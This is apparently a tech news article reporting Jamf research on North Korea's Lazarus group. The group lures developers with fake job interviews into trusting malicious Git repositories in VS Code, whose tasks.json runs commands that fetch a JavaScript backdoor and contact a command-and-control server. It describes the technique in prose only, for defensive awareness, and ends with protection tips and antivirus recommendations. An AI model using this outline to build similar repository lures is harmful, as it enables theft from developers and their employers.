**North Korean Hackers Target Microsoft Visual Studio Code in Sophisticated Attack**
North Korea's notorious hacking group, Lazarus, has once again proven its prowess in cyber warfare by exploiting a vulnerability in Microsoft Visual Studio Code (VS Code). As part of their infamous "Contagious Interview" campaign, the group created fake job postings to lure software and blockchain developers into interviews, where they would deploy malware on their devices, giving attackers unfettered access to their computers and employer networks.
The Contagious Interview campaign has been linked to some of the biggest cryptocurrency heists in recent years. Now, security researchers from Jamf have uncovered a new evolution in the group's tactics, which involves using legitimate Git repositories hosted on platforms like GitHub or GitLab to spread malware.
According to the report, the attackers create a malicious Git repository and trick victims into cloning and opening it using VS Code during the interview process. The tool then prompts the victim to trust the repository author, which automatically processes the tasks.json configuration file, triggering embedded arbitrary commands.
On macOS devices, these commands use a background shell to remotely retrieve a JavaScript payload from a platform like Vercel and pipe it into the Node.js runtime. Once executed, the JavaScript payload establishes a persistent loop that harvests host information (hostname, MAC addresses, and OS details) and communicates with a remote command-and-control (C2) server.
Finally, the backdoor periodically pings the C2 server, sending system data and receiving further malicious JavaScript instructions. This sophisticated attack highlights the importance of vigilance in the face of cyber threats.
**What You Can Do to Protect Yourself**
Jamf is warning customers to enable Threat Prevention and Advanced Threat Controls on their Macs to remain protected against these techniques. Additionally, developers are advised to exercise caution when interacting with third-party repositories, especially those shared directly or originating from unfamiliar sources.
Before trusting a repository in VS Code, it's essential to review its contents. This is particularly crucial for software and blockchain developers who often work with sensitive code and data.
**Best Antivirus Solutions**
To protect yourself against these types of attacks, consider investing in top-rated antivirus solutions:
- Bitdefender Total Security: The best overall antivirus solution that offers comprehensive protection against malware and other online threats.
- Norton 360 with LifeLock: A top-notch solution for families, providing advanced threat detection, password management, and identity theft protection.
- McAfee Mobile Security: A reliable choice for mobile devices, offering real-time scanning, app security, and device location tracking.
Stay ahead of cyber threats by staying informed. Follow TechRadar on Google News and add us as a preferred source to get our expert news, reviews, and opinion in your feeds. You can also follow us on TikTok for video updates, and subscribe to our newsletter for regular cybersecurity insights.
---
**About the Author**
Sead is a seasoned freelance journalist based in Sarajevo, Bosnia and Herzegovina. He writes about IT and cybersecurity topics, including cloud, IoT, 5G, VPN, ransomware, data breaches, and laws and regulations. With over a decade of experience, he has written for numerous media outlets, including Al Jazeera Balkans, and held content writing modules for Represent Communications.